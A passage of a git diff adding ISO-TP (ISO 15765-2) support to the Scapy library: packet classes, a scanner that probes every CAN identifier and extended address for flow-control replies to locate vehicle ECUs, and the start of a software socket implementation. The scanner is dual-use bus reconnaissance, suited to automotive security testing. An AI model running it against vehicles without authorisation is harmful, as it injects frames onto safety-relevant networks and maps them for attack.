Optional[bytes]] + return p, None + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + """ + This will set the ByteField 'length' to the correct value. + """ + if self.length is None: + pkt = pkt[:4] + chb(len(pay)) + pkt[5:] + return pkt + pay + + def guess_payload_class(self, payload): + # type: (bytes) -> Type[Packet] + """ISO-TP encodes the frame type in the first nibble of a frame. This + is used to determine the payload_class + + :param payload: payload bytes string + :return: Type of payload class + """ + t = (orb(payload[0]) & 0xf0) >> 4 + if t == 0: + return ISOTP_SF + elif t == 1: + return ISOTP_FF + elif t == 2: + return ISOTP_CF + else: + return ISOTP_FC + + +class ISOTPHeaderEA(ISOTPHeader): + name = 'ISOTPHeaderExtendedAddress' + fields_desc = [ + FlagsField('flags', 0, 3, ['error', + 'remote_transmission_request', + 'extended']), + XBitField('identifier', 0, 29), + ByteField('length', None), + ThreeBytesField('reserved', 0), + XByteField('extended_address', 0) + ] + + def post_build(self, p, pay): + # type: (bytes, bytes) -> bytes + """ + This will set the ByteField 'length' to the correct value. + 'chb(len(pay) + 1)' is required, because the field 'extended_address' + is counted as payload on the CAN layer + """ + if self.length is None: + p = p[:4] + chb(len(pay) + 1) + p[5:] + return p + pay + + +ISOTP_TYPE = {0: 'single', + 1: 'first', + 2: 'consecutive', + 3: 'flow_control'} + + +class ISOTP_SF(Packet): + name = 'ISOTPSingleFrame' + fields_desc = [ + BitEnumField('type', 0, 4, ISOTP_TYPE), + BitFieldLenField('message_size', None, 4, length_of='data'), + StrLenField('data', b'', length_from=lambda pkt: pkt.message_size) + ] + + +class ISOTP_FF(Packet): + name = 'ISOTPFirstFrame' + fields_desc = [ + BitEnumField('type', 1, 4, ISOTP_TYPE), + BitField('message_size', 0, 12), + ConditionalField(BitField('extended_message_size', 0, 32), + lambda pkt: pkt.message_size == 0), + StrField('data', b'', fmt="B") + ] + + +class ISOTP_CF(Packet): + name = 'ISOTPConsecutiveFrame' + fields_desc = [ + BitEnumField('type', 2, 4, ISOTP_TYPE), + BitField('index', 0, 4), + StrField('data', b'', fmt="B") + ] + + +class ISOTP_FC(Packet): + name = 'ISOTPFlowControlFrame' + fields_desc = [ + BitEnumField('type', 3, 4, ISOTP_TYPE), + BitEnumField('fc_flag', 0, 4, {0: 'continue', + 1: 'wait', + 2: 'abort'}), + ByteField('block_size', 0), + ByteField('separation_time', 0), + ] diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py new file mode 100644 index 00000000000..d56e355f188 --- /dev/null +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -0,0 +1,477 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# Copyright (C) Alexander Schroeder +# This program is published under a GPLv2 license + +# scapy.contrib.description = ISO-TP (ISO 15765-2) Scanner Utility +# scapy.contrib.status = library + +import time + +from scapy.compat import Iterable, Optional, Union, List, Tuple, Dict +from scapy.packet import Packet +from scapy.compat import orb +from scapy.layers.can import CAN +from scapy.supersocket import SuperSocket +from scapy.contrib.cansocket import PYTHON_CAN +from scapy.contrib.isotp.isotp_packet import ISOTPHeader, ISOTPHeaderEA, \ + ISOTP_FF, ISOTP + + +def send_multiple_ext(sock, ext_id, packet, number_of_packets): + # type: (SuperSocket, int, Packet, int) -> None + """Send multiple packets with extended addresses at once. + + This function is used for scanning with extended addresses. + It sends multiple packets at once. The number of packets + is defined in the number_of_packets variable. + It only iterates the extended ID, NOT the actual CAN ID of the packet. + This method is used in extended scan function. + + :param sock: CAN interface to send packets + :param ext_id: Extended ISOTP-Address + :param packet: Template Packet + :param number_of_packets: number of packets to send in one batch + """ + end_id = min(ext_id + number_of_packets, 255) + for i in range(ext_id, end_id + 1): + packet.extended_address = i + sock.send(packet) + + +def get_isotp_packet(identifier=0x0, extended=False, extended_can_id=False): + # type: (int, bool, bool) -> Packet + """Craft ISO-TP packet + + :param identifier: identifier of crafted packet + :param extended: boolean if packet uses extended address + :param extended_can_id: boolean if CAN should use extended Ids + :return: Crafted Packet + """ + + if extended: + pkt = ISOTPHeaderEA() / ISOTP_FF() + pkt.extended_address = 0 + pkt.data = b'\x00\x00\x00\x00\x00' + else: + pkt = ISOTPHeader() / ISOTP_FF() + pkt.data = b'\x00\x00\x00\x00\x00\x00' + if extended_can_id: + pkt.flags = "extended" + + pkt.identifier = identifier + pkt.message_size = 100 + return pkt + + +def filter_periodic_packets(packet_dict, verbose=False): + # type: (Dict[int, Tuple[Packet, int]], bool) -> None + """Filter to remove periodic packets from packet_dict + + ISOTP-Filter for periodic packets (same ID, always same time-gaps) + Deletes periodic packets in packet_dict + + :param packet_dict: Dictionary, where the filter is applied + :param verbose: Displays further information + """ + filter_dict = {} # type: Dict[int, Tuple[List[int], List[Packet]]] + + for key, value in packet_dict.items(): + pkt = value[0] + idn = value[1] + if idn not in filter_dict: + filter_dict[idn] = ([key], [pkt]) + else: + key_lst, pkt_lst = filter_dict[idn] + filter_dict[idn] = (key_lst + [key], pkt_lst + [pkt]) + + for idn in filter_dict: + key_lst = filter_dict[idn][0] + pkt_lst = filter_dict[idn][1] + if len(pkt_lst) < 3: + continue + + tg = [float(p1.time) - float(p2.time) + for p1, p2 in zip(pkt_lst[1:], pkt_lst[:-1])] + if all(abs(t1 - t2) < 0.001 for t1, t2 in zip(tg[1:], tg[:-1])): + if verbose: + print("[i] Identifier 0x%03x seems to be periodic. " + "Filtered.") + for k in key_lst: + del packet_dict[k] + + +def get_isotp_fc( + id_value, # type: int + id_list, # type: Union[List[int], Dict[int, Tuple[Packet, int]]] + noise_ids, # type: Optional[List[int]] + extended, # type: bool + packet, # type: Packet + verbose=False # type: bool +): + # type: (...) -> None + """Callback for sniff function when packet received + + If received packet is a FlowControl and not in noise_ids append it + to id_list. + + :param id_value: packet id of send packet + :param id_list: list of received IDs + :param noise_ids: list of packet IDs which will not be considered when + received during scan + :param extended: boolean if extended scan + :param packet: received packet + :param verbose: displays information during scan + """ + if packet.flags and packet.flags != "extended": + return + + if noise_ids is not None and packet.identifier in noise_ids: + return + + try: + index = 1 if extended else 0 + isotp_pci = orb(packet.data[index]) >> 4 + isotp_fc = orb(packet.data[index]) & 0x0f + if isotp_pci == 3 and 0 <= isotp_fc <= 2: + if verbose: + print("[+] Found flow-control frame from identifier 0x%03x" + " when testing identifier 0x%03x" % + (packet.identifier, id_value)) + if isinstance(id_list, dict): + id_list[id_value] = (packet, packet.identifier) + elif isinstance(id_list, list): + id_list.append(id_value) + else: + raise TypeError("Unknown type of id_list") + else: + if noise_ids is not None: + noise_ids.append(packet.identifier) + except Exception as e: + print("[!] Unknown message Exception: %s on packet: %s" % + (e, repr(packet))) + + +def scan(sock, # type: SuperSocket + scan_range=range(0x800), # type: Iterable[int] + noise_ids=None, # type: Optional[List[int]] + sniff_time=0.1, # type: float + extended_can_id=False, # type: bool + verbose=False # type: bool + ): # type: (...) -> Dict[int, Tuple[Packet, int]] + """Scan and return dictionary of detections + + ISOTP-Scan - NO extended IDs + found_packets = Dictionary with Send-to-ID as + key and a tuple (received packet, Recv_ID) + + :param sock: socket for can interface + :param scan_range: hexadecimal range of IDs to scan. Default is 0x0 - 0x7ff + :param noise_ids: list of packet IDs which will not be tested during scan + :param sniff_time: time the scan waits for isotp flow control responses + after sending a first frame + :param extended_can_id: Send extended can frames + :param verbose: displays information during scan + :return: Dictionary with all found packets + """ + return_values = dict() # type: Dict[int, Tuple[Packet, int]] + for value in scan_range: + if noise_ids and value in noise_ids: + continue + + sock.sniff(prn=lambda pkt: get_isotp_fc(value, return_values, + noise_ids, False, pkt, + verbose), + timeout=sniff_time, + started_callback=lambda: sock.send( + get_isotp_packet(value, False, extended_can_id))) + + cleaned_ret_val = dict() # type: Dict[int, Tuple[Packet, int]] + + for tested_id in return_values.keys(): + for value in range(max(0, tested_id - 2), tested_id + 2, 1): + sock.sniff(prn=lambda pkt: get_isotp_fc(value, cleaned_ret_val, + noise_ids, False, pkt, + verbose), + timeout=sniff_time * 10, + started_callback=lambda: sock.send( + get_isotp_packet(value, False, extended_can_id))) + + return cleaned_ret_val + + +def scan_extended(sock, # type: SuperSocket + scan_range=range(0x800), # type: Iterable[int] + scan_block_size=32, # type: int + extended_scan_range=range(0x100), # type: Iterable[int] + noise_ids=None, # type: Optional[List[int]] + sniff_time=0.1, # type: float + extended_can_id=False, # type: bool + verbose=False # type: bool + ): # type: (...) -> Dict[int, Tuple[Packet, int]] + """Scan with ISOTP extended addresses and return dictionary of detections + + If an answer-packet found -> slow scan with + single packages with extended ID 0 - 255 + found_packets = Dictionary with Send-to-ID + as key and a tuple (received packet, Recv_ID) + + :param sock: socket for can interface + :param scan_range: hexadecimal range of IDs to scan. Default is 0x0 - 0x7ff + :param scan_block_size: count of packets send at once + :param extended_scan_range: range to search for extended ISOTP addresses + :param noise_ids: list of packet IDs which will not be tested during scan + :param sniff_time: time the scan waits for isotp flow control responses + after sending a first frame + :param extended_can_id: Send extended can frames + :param verbose: displays information during scan + :return: Dictionary with all found packets + """ + return_values = dict() # type: Dict[int, Tuple[Packet, int]] + scan_block_size = scan_block_size or 1 + + for value in scan_range: + if noise_ids and value in noise_ids: + continue + + pkt = get_isotp_packet( + value, extended=True, extended_can_id=extended_can_id) + id_list = [] # type: List[int] + r = list(extended_scan_range) + for ext_isotp_id in range(r[0], r[-1], scan_block_size): + sock.sniff(prn=lambda p: get_isotp_fc(ext_isotp_id, id_list, + noise_ids, True, p, + verbose), + timeout=sniff_time * 3, + started_callback=lambda: send_multiple_ext( + sock, ext_isotp_id, pkt, scan_block_size)) + # sleep to prevent flooding + time.sleep(sniff_time) + + # remove duplicate IDs + id_list = list(set(id_list)) + for ext_isotp_id in id_list: + for ext_id in range(max(ext_isotp_id - 2, 0), + min(ext_isotp_id + scan_block_size + 2, 256)): + pkt.extended_address = ext_id + full_id = (value << 8) + ext_id + sock.sniff(prn=lambda pkt: get_isotp_fc(full_id, + return_values, + noise_ids, True, + pkt, verbose), + timeout=sniff_time * 2, + started_callback=lambda: sock.send(pkt)) + + return return_values + + +def isotp_scan(sock, # type: SuperSocket + scan_range=range(0x7ff + 1), # type: Iterable[int] + extended_addressing=False, # type: bool + extended_scan_range=range(0x100), # type: Iterable[int] + noise_listen_time=2, # type: int + sniff_time=0.1, # type: float + output_format=None, # type: Optional[str] + can_interface=None, # type: Optional[str] + extended_can_id=False, # type: bool + verbose=False # type: bool + ): + # type: (...) -> Union[str, List[SuperSocket]] + """Scan for ISOTP Sockets on a bus and return findings + + Scan for ISOTP Sockets in the defined range and returns found sockets + in a specified format. The format can be: + + - text: human readable output + - code: python code for copy&paste + - sockets: if output format is not specified, ISOTPSockets will be + created and returned in a list + + :param sock: CANSocket object to communicate with the bus under scan + :param scan_range: range of CAN-Identifiers to scan. Default is 0x0 - 0x7ff + :param extended_addressing: scan with ISOTP extended addressing + :param extended_scan_range: range for ISOTP extended addressing values + :param noise_listen_time: seconds to listen for default communication on + the bus + :param sniff_time: time the scan waits for isotp flow control responses + after sending a first frame + :param output_format: defines the format of the returned results + (text, code or sockets). Provide a string e.g. + "text". Default is "socket". + :param can_interface: interface used to create the returned code/sockets + :param extended_can_id: Use Extended CAN-Frames + :param verbose: displays information during scan + :return: + """ + if verbose: + print("Filtering background noise...") + + # Send dummy packet. In most cases, this triggers activity on the bus. + + dummy_pkt = CAN(identifier=0x123, + data=b'\xaa\xbb\xcc\xdd\xee\xff\xaa\xbb') + + background_pkts = sock.sniff(timeout=noise_listen_time, + started_callback=lambda: + sock.send(dummy_pkt)) + + noise_ids = list(set(pkt.identifier for pkt in background_pkts)) + + if extended_addressing: + found_packets = scan_extended(sock, scan_range, + extended_scan_range=extended_scan_range, + noise_ids=noise_ids, + sniff_time=sniff_time, + extended_can_id=extended_can_id, + verbose=verbose) + else: + found_packets = scan(sock, scan_range, + noise_ids=noise_ids, + sniff_time=sniff_time, + extended_can_id=extended_can_id, + verbose=verbose) + + filter_periodic_packets(found_packets, verbose) + + if output_format == "text": + return generate_text_output(found_packets, extended_addressing) + + if output_format == "code": + return generate_code_output(found_packets, can_interface, + extended_addressing) + + return generate_isotp_list(found_packets, can_interface or sock, + extended_addressing) + + +def generate_text_output(found_packets, extended_addressing=False): + # type: (Dict[int, Tuple[Packet, int]], bool) -> str + """Generate a human readable output from the result of the `scan` or the + `scan_extended` function. + + :param found_packets: result of the `scan` or `scan_extended` function + :param extended_addressing: print results from a scan with + ISOTP extended addressing + :return: human readable scan results + """ + if not found_packets: + return "No packets found." + + text = "\nFound %s ISOTP-FlowControl Packet(s):" % len(found_packets) + for pack in found_packets: + if extended_addressing: + send_id = pack // 256 + send_ext = pack - (send_id * 256) + ext_id = hex(orb(found_packets[pack][0].data[0])) + text += "\nSend to ID: %s" \ + "\nSend to extended ID: %s" \ + "\nReceived ID: %s" \ + "\nReceived extended ID: %s" \ + "\nMessage: %s" % \ + (hex(send_id), hex(send_ext), + hex(found_packets[pack][0].identifier), ext_id, + repr(found_packets[pack][0])) + else: + text += "\nSend to ID: %s" \ + "\nReceived ID: %s" \ + "\nMessage: %s" % \ + (hex(pack), + hex(found_packets[pack][0].identifier), + repr(found_packets[pack][0])) + + padding = found_packets[pack][0].length == 8 + if padding: + text += "\nPadding enabled" + else: + text += "\nNo Padding" + + text += "\n" + return text + + +def generate_code_output(found_packets, can_interface="iface", + extended_addressing=False): + # type: (Dict[int, Tuple[Packet, int]], Optional[str], bool) -> str + """Generate a copy&past-able output from the result of the `scan` or + the `scan_extended` function. + + :param found_packets: result of the `scan` or `scan_extended` function + :param can_interface: description string for a CAN interface to be + used for the creation of the output. + :param extended_addressing: print results from a scan with ISOTP + extended addressing + :return: Python-code as string to generate all found sockets + """ + result = "" + if not found_packets: + return result + + header = "\n\nimport can\n" \ + "conf.contribs['CANSocket'] = {'use-python-can': %s}\n" \ + "load_contrib('cansocket')\n" \ + "load_contrib('isotp')\n\n" % PYTHON_CAN + + for pack in found_packets: + if extended_addressing: + send_id = pack // 256 + send_ext = pack - (send_id * 256) + ext_id = orb(found_packets[pack][0].data[0]) + result += "ISOTPSocket(%s, sid=0x%x, did=0x%x, padding=%s, " \ + "extended_addr=0x%x, extended_rx_addr=0x%x, " \ + "basecls=ISOTP)\n" % \ + (can_interface, send_id, + int(found_packets[pack][0].identifier), + found_packets[pack][0].length == 8, + send_ext, + ext_id) + + else: + result += "ISOTPSocket(%s, sid=0x%x, did=0x%x, padding=%s, " \ + "basecls=ISOTP)\n" % \ + (can_interface, pack, + int(found_packets[pack][0].identifier), + found_packets[pack][0].length == 8) + return header + result + + +def generate_isotp_list(found_packets, # type: Dict[int, Tuple[Packet, int]] + can_interface, # type: Union[SuperSocket, str] + extended_addressing=False # type: bool + ): + # type: (...) -> List[SuperSocket] + """Generate a list of ISOTPSocket objects from the result of the `scan` or + the `scan_extended` function. + + :param found_packets: result of the `scan` or `scan_extended` function + :param can_interface: description string for a CAN interface to be + used for the creation of the output. + :param extended_addressing: print results from a scan with ISOTP + extended addressing + :return: A list of all found ISOTPSockets + """ + from scapy.contrib.isotp import ISOTPSocket + + socket_list = [] # type: List[SuperSocket] + for pack in found_packets: + pkt = found_packets[pack][0] + + dest_id = pkt.identifier + pad = True if pkt.length == 8 else False + + if extended_addressing: + source_id = pack >> 8 + source_ext = int(pack - (source_id * 256)) + dest_ext = orb(pkt.data[0]) + socket_list.append(ISOTPSocket(can_interface, sid=source_id, + extended_addr=source_ext, + did=dest_id, + extended_rx_addr=dest_ext, + padding=pad, + basecls=ISOTP)) + else: + source_id = pack + socket_list.append(ISOTPSocket(can_interface, sid=source_id, + did=dest_id, padding=pad, + basecls=ISOTP)) + return socket_list diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py new file mode 100644 index 00000000000..ef6e1dd4a45 --- /dev/null +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -0,0 +1,1047 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# Copyright (C) Enrico Pozzobon +# This program is published under a GPLv2 license + +# scapy.contrib.description = ISO-TP (ISO 15765-2) Soft Socket Library +# scapy.contrib.status = library + +import struct +import time +import traceback +import heapq +import socket + +from threading import Thread, Event, Lock + +from scapy.compat import Optional, Union, List, Tuple, Any, Type, cast, \ + Callable, TYPE_CHECKING +from scapy.packet import Packet +from scapy.layers.can import CAN +import scapy.modules.six as six +from scapy.modules.six.moves import queue +from scapy.error import Scapy_Exception, warning, log_runtime +from scapy.supersocket import SuperSocket +from scapy.config import conf +from scapy.consts import LINUX +from scapy.sendrecv import sniff +from scapy.utils import EDecimal +from scapy.contrib.isotp.isotp_packet import ISOTP, CAN_MAX_DLEN, N_PCI_SF, \ + N_PCI_CF, N_PCI_FC, N_PCI_FF, ISOTP_MAX_DLEN, ISOTP_MAX_DLEN_2015 + +if TYPE_CHECKING: + from scapy.contrib.cansocket import CANSocket + + +# Enum states +ISOTP_IDLE = 0 +ISOTP_WAIT_FIRST_FC = 1 +ISOTP_WAIT_FC = 2 +ISOTP_WAIT_DATA = 3 +ISOTP_SENDING = 4 + +# /* Flow Status given in FC frame */ +ISOTP_FC_CTS = 0 # /* clear to send */ +ISOTP_FC_WT = 1 # /* wait */ +ISOTP_FC_OVFLW = 2 # /* overflow */ + + +class ISOTPSoftSocket(SuperSocket): + """ + This class is a wrapper around the ISOTPSocketImplementation, for the + reasons described below. + + The ISOTPSoftSocket aims to be fully compatible with the Linux ISOTP + sockets provided by the can-isotp kernel module, while being usable on any + operating system. + Therefore, this socket needs to be able to respond to an incoming FF frame + with a FC frame even before the recv() method is called. + A thread is needed for receiving CAN frames in the background, and since + the lower layer CAN implementation is not guaranteed to have a functioning + POSIX select(), each ISOTP socket needs its own CAN receiver thread. + SuperSocket automatically calls the close() method when the GC destroys an + ISOTPSoftSocket. However, note that if any thread holds a reference to + an ISOTPSoftSocket object, it will not be collected by the GC. + + The implementation of the ISOTP protocol, along with the necessary + thread, are stored in the ISOTPSocketImplementation class, and therefore: + + * There no reference from ISOTPSocketImplementation to ISOTPSoftSocket + * ISOTPSoftSocket can be normally garbage collected + * Upon destruction, ISOTPSoftSocket.close() will be called + * ISOTPSoftSocket.close() will call ISOTPSocketImplementation.close() + * RX background thread can be stopped by the garbage collector + + Initialize an ISOTPSoftSocket using the provided underlying can socket. + + Example (with NativeCANSocket underneath): + >>> conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} + >>> load_contrib('isotp') + >>> with ISOTPSocket("can0", sid=0x641, did=0x241) as sock: + >>> sock.send(...) + + Example (with PythonCANSocket underneath): + >>> conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} + >>> conf.contribs['CANSocket'] = {'use-python-can': True} + >>> load_contrib('isotp') + >>> with ISOTPSocket(CANSocket(bustype='socketcan', channel="can0"), sid=0x641, did=0x241) as sock: + >>> sock.send(...) + + :param can_socket: a CANSocket instance, preferably filtering only can + frames with identifier equal to did + :param sid: the CAN identifier of the sent CAN frames + :param did: the CAN identifier of the received CAN frames + :param extended_addr: the extended address of the sent ISOTP frames + (can be None) + :param extended_rx_addr: the extended address of the received ISOTP + frames (can be None) + :param rx_block_size: block size sent in Flow Control ISOTP frames + :param rx_separation_time_min: minimum desired separation time sent in + Flow Control ISOTP frames + :param padding: If True, pads sending packets with 0x00 which not + count to the payload. + Does not affect receiving packets. + :param basecls: base class of the packets emitted by this socket + """ # noqa: E501 + + nonblocking_socket = True + + def __init__(self, + can_socket=None, # type: Optional["CANSocket"] + sid=0, # type: int + did=0, # type: int + extended_addr=None, # type: Optional[int] + extended_rx_addr=None, # type: Optional[int] + rx_block_size=0, # type: int + rx_separation_time_min=0, # type: int + padding=False, # type: bool + listen_only=False, # type: bool + basecls=ISOTP # type: Type[Packet] + ): + # type: (...) -> None + + if six.PY3 and LINUX and isinstance(can_socket, six.string_types): + from scapy.contrib.cansocket_native import NativeCANSocket + can_socket = NativeCANSocket(can_socket) + elif isinstance(can_socket, six.string_types): + raise Scapy_Exception("Provide a CANSocket object instead") + + self.exsrc = extended_addr + self.exdst = extended_rx_addr + self.src = sid + self.dst = did + + impl = ISOTPSocketImplementation( + can_socket, + src_id=sid, + dst_id=did, + padding=padding, + extended_addr=extended_addr, + extended_rx_addr=extended_rx_addr, + rx_block_size=rx_block_size, + rx_separation_time_min=rx_separation_time_min, + listen_only=listen_only + ) + + # Cast for compatibility to functions from SuperSocket. + self.ins = cast(socket.socket, impl) + self.outs = cast(socket.socket, impl) + self.impl = impl + self.basecls = basecls + if basecls is None: + warning('Provide a basecls ') + + def close(self): + # type: () -> None + if not self.closed: + self.impl.close() + self.closed = True + + def begin_send(self, p): + # type: (Packet) -> int + """Begin the transmission of message p. This method returns after + sending the first frame. If multiple frames are necessary to send the + message, this socket will unable to send other messages until either + the transmission of this frame succeeds or it fails.""" + + if not self.closed: + if hasattr(p, "sent_time"): + p.sent_time = time.time() + self.impl.begin_send(bytes(p)) + return len(p) + else: + return 0 + + def recv_raw(self, x=0xffff): + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 + """Receive a complete ISOTP message, blocking until a message is + received or the specified timeout is reached. + If self.timeout is 0, then this function doesn't block and returns the + first frame in the receive buffer or None if there isn't any.""" + if not self.closed: + tup = self.impl.recv() + if tup is not None: + return self.basecls, tup[0], float(tup[1]) + return self.basecls, None, None + + def recv(self, x=0xffff): + # type: (int) -> Optional[Packet] + msg = super(ISOTPSoftSocket, self).recv(x) + if msg is None: + return None + + if hasattr(msg, "src"): + msg.src = self.src + if hasattr(msg, "dst"): + msg.dst = self.dst + if hasattr(msg, "exsrc"): + msg.exsrc = self.exsrc + if hasattr(msg, "exdst"): + msg.exdst = self.exdst + return msg + + @staticmethod + def select(sockets, remain=None): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] + """This function is called during sendrecv() routine to wait for + sockets to be ready to receive + """ + + def find_ready_sockets(socks): + # type: (List[SuperSocket]) -> List[SuperSocket] + return [x for x in socks if isinstance(x, ISOTPSoftSocket) and + not x.closed and not x.impl.rx_queue.empty()] + + ready_sockets = find_ready_sockets(sockets) + + blocking = remain != 0 + if len(ready_sockets) > 0 or not blocking: + return ready_sockets + + exit_select = Event() + + def my_cb(msg): + # type: (Any) -> None + exit_select.set() + + try: + for s in sockets: + if not s.closed and isinstance(s, ISOTPSoftSocket): + s.impl.rx_callbacks.append(my_cb) + + exit_select.wait(remain) + + finally: + for s in sockets: + if isinstance(s, ISOTPSoftSocket): + try: + s.impl.rx_callbacks.remove(my_cb) + except (ValueError, AttributeError): + pass + + ready_sockets = find_ready_sockets(sockets) + return ready_sockets + + +class CANReceiverThread(Thread): + """ + Helper class that receives CAN frames and feeds them to the provided + callback. It relies on CAN frames being enqueued in the CANSocket object + and not being lost if they come before the sniff method is called. This is + true in general since sniff is usually implemented as repeated recv(), but + might be false in some implementation of CANSocket + + Initialize the thread. In order for this thread to be able to be + stopped by the destructor of another object, it is important to not + keep a reference to the object in the callback function. + + :param socket: the CANSocket upon which this class will call the + sniff() method + :param callback: function to call whenever a CAN frame is received + """ + + def __init__(self, can_socket, callback): + # type: ("CANSocket", Callable[[Packet], None]) -> None + super(CANReceiverThread, self).__init__() + self.socket = can_socket + self.callback = callback + self.exiting = False + self._thread_started = Event() + self.exception = None # type: Optional[Exception] + self.name = "CANReceiver" + self.name + + def start(self): + # type: () -> None + super(CANReceiverThread, self).start() + if not self._thread_started.wait(5): + raise Scapy_Exception("CAN RX thread not started in 5s.") + + def run(self): + # type: () -> None + self._thread_started.set() + try: + def prn(msg): + # type: (Packet) -> None + if not self.exiting: + self.callback(msg) + + while 1: + try: + sniff(store=False, timeout=1, count=1, + stop_filter=lambda x: self.exiting, + prn=prn, opened_socket=self.socket) + except ValueError as ex: + if not self.exiting: + raise ex + if self.exiting: + return + except Exception as e: + self.exception = e + + def stop(self): + # type: () -> None + self.exiting = True + + +class TimeoutScheduler: + """A timeout scheduler which uses a single thread for all timeouts, unlike + python's own Timer objects which use a thread each.""" + VERBOSE = False + GRACE = .1 + _mutex = Lock() + _event = Event() + _thread = None # type: Optional[Thread] + + # use heapq functions on _handles! + _handles = [] # type: List[TimeoutScheduler.Handle] + + @staticmethod + def schedule(timeout, callback): + # type: (float, Callable[[], None]) -> TimeoutScheduler.Handle + """Schedules the execution of a timeout. + + The function `callback` will be called in `timeout` seconds. + + Returns a handle that can be used to remove the timeout.""" + when = TimeoutScheduler._time() + timeout + handle = TimeoutScheduler.Handle(when, callback) + handles = TimeoutScheduler._handles + + with TimeoutScheduler._mutex: + # Add the handler to the heap, keeping the invariant + # Time complexity is O(log n) + heapq.heappush(handles, handle) + must_interrupt = (handles[0] == handle) + + # Start the scheduling thread if it is not started already + if TimeoutScheduler._thread is None: + t = Thread(target=TimeoutScheduler._task, + name="TimeoutScheduler._task") + must_interrupt = False + TimeoutScheduler._thread = t + TimeoutScheduler._event.clear() + t.start() + + if must_interrupt: + # if the new timeout got in front of the one we are currently + # waiting on, the current wait operation must be aborted and + # updated with the new timeout + TimeoutScheduler._event.set() + + # Return the handle to the timeout so that the user can cancel it + return handle + + @staticmethod + def cancel(handle): + # type: (TimeoutScheduler.Handle) -> None + """Provided its handle, cancels the execution of a timeout.""" + + handles = TimeoutScheduler._handles + with TimeoutScheduler._mutex: + if handle in handles: + # Time complexity is O(n) + handle._cb = None + handles.remove(handle) + heapq.heapify(handles) + + if len(handles) == 0: + # set the event to stop the wait - this kills the thread + TimeoutScheduler._event.set() + else: + raise Scapy_Exception("Handle not found") + + @staticmethod + def clear(): + # type: () -> None + """Cancels the execution of all timeouts.""" + with TimeoutScheduler._mutex: + TimeoutScheduler._handles.clear() + + # set the event to stop the wait - this kills the thread + TimeoutScheduler._event.set() + + @staticmethod + def _peek_next(): + # type: () -> Optional[TimeoutScheduler.Handle] + """Returns the next timeout to execute, or `None` if list is empty, + without modifying the list""" + with TimeoutScheduler._mutex: + handles = TimeoutScheduler._handles + if len(handles) == 0: + return None + else: + return handles[0] + + @staticmethod + def _wait(handle): + # type: (Optional[TimeoutScheduler.Handle]) -> None + """Waits until it is time to execute the provided handle, or until + another thread calls _event.set()""" + + if handle is None: + when = TimeoutScheduler.GRACE + else: + when = handle._when + + # Check how much time until the next timeout + now = TimeoutScheduler._time() + to_wait = when - now + + # Wait until the next timeout, + # or until event.set() gets called in another thread. + if to_wait > 0: + log_runtime.debug("TimeoutScheduler Thread going to sleep @ %f " + + "for %fs", now, to_wait) + interrupted = TimeoutScheduler._event.wait(to_wait) + new = TimeoutScheduler._time() + log_runtime.debug("TimeoutScheduler Thread awake @ %f, slept for" + + " %f, interrupted=%d", new, new - now, + interrupted) + + # Clear the event so that we can wait on it again, + # Must be done before doing the callbacks to avoid losing a set(). + TimeoutScheduler._event.clear() + + @staticmethod + def _task(): + # type: () -> None + """Executed in a background thread, this thread will automatically + start when the first timeout is added and stop when the last timeout + is removed or executed.""" + + log_runtime.debug("TimeoutScheduler Thread spawning @ %f", + TimeoutScheduler._time()) + + time_empty = None + + try: + while 1: + handle = TimeoutScheduler._peek_next() + if handle is None: + now = TimeoutScheduler._time() + if time_empty is None: + time_empty = now + # 100 ms of grace time before killing the thread + if TimeoutScheduler.GRACE < now - time_empty: + return + TimeoutScheduler._wait(handle) + TimeoutScheduler._poll() + + finally: + # Worst case scenario: if this thread dies, the next scheduled + # timeout will start a new one + log_runtime.debug("TimeoutScheduler Thread dying @ %f", + TimeoutScheduler._time()) + TimeoutScheduler._thread = None + + @staticmethod + def _poll(): + # type: () -> None + """Execute all the callbacks that were due until now""" + + handles = TimeoutScheduler._handles + handle = None + while 1: + with TimeoutScheduler._mutex: + now = TimeoutScheduler._time() + if len(handles) == 0 or handles[0]._when > now: + # There is nothing to execute yet + return + + # Time complexity is O(log n) + handle = heapq.heappop(handles) + callback = None + if handle is not None: + callback = handle._cb + handle._cb = True + + # Call the callback here, outside of the mutex + if callable(callback): + try: + callback() + except Exception: + traceback.print_exc() + + @staticmethod + def _time(): + # type: () -> float + if six.PY2: + return time.clock() + return time.monotonic() + + class Handle: + """Handle for a timeout, consisting of a callback and a time when it + should be executed.""" + __slots__ = ['_when', '_cb'] + + def __init__(self, + when, # type: float + cb # type: Optional[Union[Callable[[], None], bool]] + ): + # type: (...) -> None + self._when = when + self._cb = cb + + def cancel(self): + # type: () -> bool + """Cancels this timeout, preventing it from executing its + callback""" + if self._cb is None: + raise Scapy_Exception("cancel() called on " + "previous canceled Handle") + else: + if isinstance(self._cb, bool): + # Handle was already executed. + # We don't need to cancel anymore + return False + else: + self._cb = None + TimeoutScheduler.cancel(self) + return True + + def __lt__(self, other): + # type: (Any) -> bool + if not isinstance(other, TimeoutScheduler.Handle): + raise TypeError() + return self._when < other._when + + def __le__(self, other): + # type: (Any) -> bool + if not isinstance(other, TimeoutScheduler.Handle): + raise TypeError() + return self._when <= other._when + + def __gt__(self, other): + # type: (Any) -> bool + if not isinstance(other, TimeoutScheduler.Handle): + raise TypeError() + return self._when > other._when + + def __ge__(self, other): + # type: (Any) -> bool + if not isinstance(other, TimeoutScheduler.Handle): + raise TypeError() + return self._when >= other._when + + +class ISOTPSocketImplementation: + """ + Implementation of an ISOTP "state machine". + + Most of the ISOTP logic was taken from + https://github.com/hartkopp/can-isotp/blob/master/net/can/isotp.c + + This class is separated from ISOTPSoftSocket to make sure the background + thread can't hold a reference to ISOTPSoftSocket, allowing it to be + collected by the GC. + + :param can_socket: a CANSocket instance, preferably filtering only can + frames with identifier equal to did + :param src_id: the CAN identifier of the sent CAN frames + :param dst_id: the CAN identifier of the received CAN frames + :param padding: If True, pads sending 